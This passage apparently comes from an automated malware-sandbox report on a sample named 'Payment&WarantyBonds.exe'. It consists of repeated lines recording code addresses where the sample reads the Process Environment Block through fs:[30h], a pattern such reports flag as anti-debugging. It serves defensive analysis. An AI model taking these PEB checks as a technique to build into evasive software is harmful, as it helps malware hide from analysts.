                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182245A mov eax, dword ptr fs:[00000030h]2_2_0182245A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA456 mov eax, dword ptr fs:[00000030h]2_2_018BA456
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188C460 mov ecx, dword ptr fs:[00000030h]2_2_0188C460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182A470 mov eax, dword ptr fs:[00000030h]2_2_0182A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182A470 mov eax, dword ptr fs:[00000030h]2_2_0182A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182A470 mov eax, dword ptr fs:[00000030h]2_2_0182A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A678E mov eax, dword ptr fs:[00000030h]2_2_018A678E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B47A0 mov eax, dword ptr fs:[00000030h]2_2_018B47A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018007AF mov eax, dword ptr fs:[00000030h]2_2_018007AF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180C7C0 mov eax, dword ptr fs:[00000030h]2_2_0180C7C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018807C3 mov eax, dword ptr fs:[00000030h]2_2_018807C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188E7E1 mov eax, dword ptr fs:[00000030h]2_2_0188E7E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018227ED mov eax, dword ptr fs:[00000030h]2_2_018227ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018227ED mov eax, dword ptr fs:[00000030h]2_2_018227ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018227ED mov eax, dword ptr fs:[00000030h]2_2_018227ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018047FB mov eax, dword ptr fs:[00000030h]2_2_018047FB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018047FB mov eax, dword ptr fs:[00000030h]2_2_018047FB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C700 mov eax, dword ptr fs:[00000030h]2_2_0183C700
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800710 mov eax, dword ptr fs:[00000030h]2_2_01800710
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01830710 mov eax, dword ptr fs:[00000030h]2_2_01830710
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C720 mov eax, dword ptr fs:[00000030h]2_2_0183C720
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C720 mov eax, dword ptr fs:[00000030h]2_2_0183C720
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187C730 mov eax, dword ptr fs:[00000030h]2_2_0187C730
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183273C mov eax, dword ptr fs:[00000030h]2_2_0183273C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183273C mov ecx, dword ptr fs:[00000030h]2_2_0183273C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183273C mov eax, dword ptr fs:[00000030h]2_2_0183273C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183674D mov esi, dword ptr fs:[00000030h]2_2_0183674D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183674D mov eax, dword ptr fs:[00000030h]2_2_0183674D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183674D mov eax, dword ptr fs:[00000030h]2_2_0183674D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800750 mov eax, dword ptr fs:[00000030h]2_2_01800750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842750 mov eax, dword ptr fs:[00000030h]2_2_01842750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842750 mov eax, dword ptr fs:[00000030h]2_2_01842750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188E75D mov eax, dword ptr fs:[00000030h]2_2_0188E75D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01884755 mov eax, dword ptr fs:[00000030h]2_2_01884755
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808770 mov eax, dword ptr fs:[00000030h]2_2_01808770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804690 mov eax, dword ptr fs:[00000030h]2_2_01804690
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804690 mov eax, dword ptr fs:[00000030h]2_2_01804690
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C6A6 mov eax, dword ptr fs:[00000030h]2_2_0183C6A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018366B0 mov eax, dword ptr fs:[00000030h]2_2_018366B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0183A6C7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A6C7 mov eax, dword ptr fs:[00000030h]2_2_0183A6C7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018806F1 mov eax, dword ptr fs:[00000030h]2_2_018806F1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018806F1 mov eax, dword ptr fs:[00000030h]2_2_018806F1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E609 mov eax, dword ptr fs:[00000030h]2_2_0187E609
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842619 mov eax, dword ptr fs:[00000030h]2_2_01842619
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01836620 mov eax, dword ptr fs:[00000030h]2_2_01836620
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838620 mov eax, dword ptr fs:[00000030h]2_2_01838620
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E627 mov eax, dword ptr fs:[00000030h]2_2_0181E627
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180262C mov eax, dword ptr fs:[00000030h]2_2_0180262C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181C640 mov eax, dword ptr fs:[00000030h]2_2_0181C640
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C866E mov eax, dword ptr fs:[00000030h]2_2_018C866E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C866E mov eax, dword ptr fs:[00000030h]2_2_018C866E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A660 mov eax, dword ptr fs:[00000030h]2_2_0183A660
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A660 mov eax, dword ptr fs:[00000030h]2_2_0183A660
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01832674 mov eax, dword ptr fs:[00000030h]2_2_01832674
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018009AD mov eax, dword ptr fs:[00000030h]2_2_018009AD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018009AD mov eax, dword ptr fs:[00000030h]2_2_018009AD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018889B3 mov esi, dword ptr fs:[00000030h]2_2_018889B3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018889B3 mov eax, dword ptr fs:[00000030h]2_2_018889B3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018889B3 mov eax, dword ptr fs:[00000030h]2_2_018889B3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018969C0 mov eax, dword ptr fs:[00000030h]2_2_018969C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A9D0 mov eax, dword ptr fs:[00000030h]2_2_0180A9D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A9D0 mov eax, dword ptr fs:[00000030h]2_2_0180A9D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A9D0 mov eax, dword ptr fs:[00000030h]2_2_0180A9D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A9D0 mov eax, dword ptr fs:[00000030h]2_2_0180A9D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A9D0 mov eax, dword ptr fs:[00000030h]2_2_0180A9D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A9D0 mov eax, dword ptr fs:[00000030h]2_2_0180A9D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018349D0 mov eax, dword ptr fs:[00000030h]2_2_018349D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CA9D3 mov eax, dword ptr fs:[00000030h]2_2_018CA9D3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F8918 mov eax, dword ptr fs:[00000030h]2_2_017F8918
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F8918 mov eax, dword ptr fs:[00000030h]2_2_017F8918
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188E9E0 mov eax, dword ptr fs:[00000030h]2_2_0188E9E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018329F9 mov eax, dword ptr fs:[00000030h]2_2_018329F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018329F9 mov eax, dword ptr fs:[00000030h]2_2_018329F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E908 mov eax, dword ptr fs:[00000030h]2_2_0187E908
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E908 mov eax, dword ptr fs:[00000030h]2_2_0187E908
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188C912 mov eax, dword ptr fs:[00000030h]2_2_0188C912
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188892A mov eax, dword ptr fs:[00000030h]2_2_0188892A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0189892B mov eax, dword ptr fs:[00000030h]2_2_0189892B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4940 mov eax, dword ptr fs:[00000030h]2_2_018D4940
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01880946 mov eax, dword ptr fs:[00000030h]2_2_01880946
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01826962 mov eax, dword ptr fs:[00000030h]2_2_01826962
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01826962 mov eax, dword ptr fs:[00000030h]2_2_01826962
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01826962 mov eax, dword ptr fs:[00000030h]2_2_01826962
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184096E mov eax, dword ptr fs:[00000030h]2_2_0184096E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184096E mov edx, dword ptr fs:[00000030h]2_2_0184096E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184096E mov eax, dword ptr fs:[00000030h]2_2_0184096E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A4978 mov eax, dword ptr fs:[00000030h]2_2_018A4978
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A4978 mov eax, dword ptr fs:[00000030h]2_2_018A4978
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188C97C mov eax, dword ptr fs:[00000030h]2_2_0188C97C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800887 mov eax, dword ptr fs:[00000030h]2_2_01800887
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188C89D mov eax, dword ptr fs:[00000030h]2_2_0188C89D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E8C0 mov eax, dword ptr fs:[00000030h]2_2_0182E8C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D08C0 mov eax, dword ptr fs:[00000030h]2_2_018D08C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CA8E4 mov eax, dword ptr fs:[00000030h]2_2_018CA8E4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C8F9 mov eax, dword ptr fs:[00000030h]2_2_0183C8F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C8F9 mov eax, dword ptr fs:[00000030h]2_2_0183C8F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188C810 mov eax, dword ptr fs:[00000030h]2_2_0188C810
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A483A mov eax, dword ptr fs:[00000030h]2_2_018A483A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A483A mov eax, dword ptr fs:[00000030h]2_2_018A483A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A830 mov eax, dword ptr fs:[00000030h]2_2_0183A830
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822835 mov eax, dword ptr fs:[00000030h]2_2_01822835
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822835 mov eax, dword ptr fs:[00000030h]2_2_01822835
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822835 mov eax, dword ptr fs:[00000030h]2_2_01822835
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822835 mov ecx, dword ptr fs:[00000030h]2_2_01822835
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822835 mov eax, dword ptr fs:[00000030h]2_2_01822835
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822835 mov eax, dword ptr fs:[00000030h]2_2_01822835
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01812840 mov ecx, dword ptr fs:[00000030h]2_2_01812840
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01830854 mov eax, dword ptr fs:[00000030h]2_2_01830854
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804859 mov eax, dword ptr fs:[00000030h]2_2_01804859
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804859 mov eax, dword ptr fs:[00000030h]2_2_01804859
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01896870 mov eax, dword ptr fs:[00000030h]2_2_01896870
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01896870 mov eax, dword ptr fs:[00000030h]2_2_01896870
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188E872 mov eax, dword ptr fs:[00000030h]2_2_0188E872
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188E872 mov eax, dword ptr fs:[00000030h]2_2_0188E872
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FCB7E mov eax, dword ptr fs:[00000030h]2_2_017FCB7E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F8B50 mov eax, dword ptr fs:[00000030h]2_2_017F8B50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B4BB0 mov eax, dword ptr fs:[00000030h]2_2_018B4BB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B4BB0 mov eax, dword ptr fs:[00000030h]2_2_018B4BB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810BBE mov eax, dword ptr fs:[00000030h]2_2_01810BBE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810BBE mov eax, dword ptr fs:[00000030h]2_2_01810BBE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01820BCB mov eax, dword ptr fs:[00000030h]2_2_01820BCB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01820BCB mov eax, dword ptr fs:[00000030h]2_2_01820BCB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01820BCB mov eax, dword ptr fs:[00000030h]2_2_01820BCB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800BCD mov eax, dword ptr fs:[00000030h]2_2_01800BCD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800BCD mov eax, dword ptr fs:[00000030h]2_2_01800BCD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800BCD mov eax, dword ptr fs:[00000030h]2_2_01800BCD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AEBD0 mov eax, dword ptr fs:[00000030h]2_2_018AEBD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808BF0 mov eax, dword ptr fs:[00000030h]2_2_01808BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808BF0 mov eax, dword ptr fs:[00000030h]2_2_01808BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808BF0 mov eax, dword ptr fs:[00000030h]2_2_01808BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188CBF0 mov eax, dword ptr fs:[00000030h]2_2_0188CBF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182EBFC mov eax, dword ptr fs:[00000030h]2_2_0182EBFC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4B00 mov eax, dword ptr fs:[00000030h]2_2_018D4B00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187EB1D mov eax, dword ptr fs:[00000030h]2_2_0187EB1D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182EB20 mov eax, dword ptr fs:[00000030h]2_2_0182EB20
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182EB20 mov eax, dword ptr fs:[00000030h]2_2_0182EB20
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C8B28 mov eax, dword ptr fs:[00000030h]2_2_018C8B28
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C8B28 mov eax, dword ptr fs:[00000030h]2_2_018C8B28
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B4B4B mov eax, dword ptr fs:[00000030h]2_2_018B4B4B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B4B4B mov eax, dword ptr fs:[00000030h]2_2_018B4B4B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A8B42 mov eax, dword ptr fs:[00000030h]2_2_018A8B42
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01896B40 mov eax, dword ptr fs:[00000030h]2_2_01896B40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01896B40 mov eax, dword ptr fs:[00000030h]2_2_01896B40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CAB40 mov eax, dword ptr fs:[00000030h]2_2_018CAB40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AEB50 mov eax, dword ptr fs:[00000030h]2_2_018AEB50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D2B57 mov eax, dword ptr fs:[00000030h]2_2_018D2B57
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D2B57 mov eax, dword ptr fs:[00000030h]2_2_018D2B57
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D2B57 mov eax, dword ptr fs:[00000030h]2_2_018D2B57
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D2B57 mov eax, dword ptr fs:[00000030h]2_2_018D2B57
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
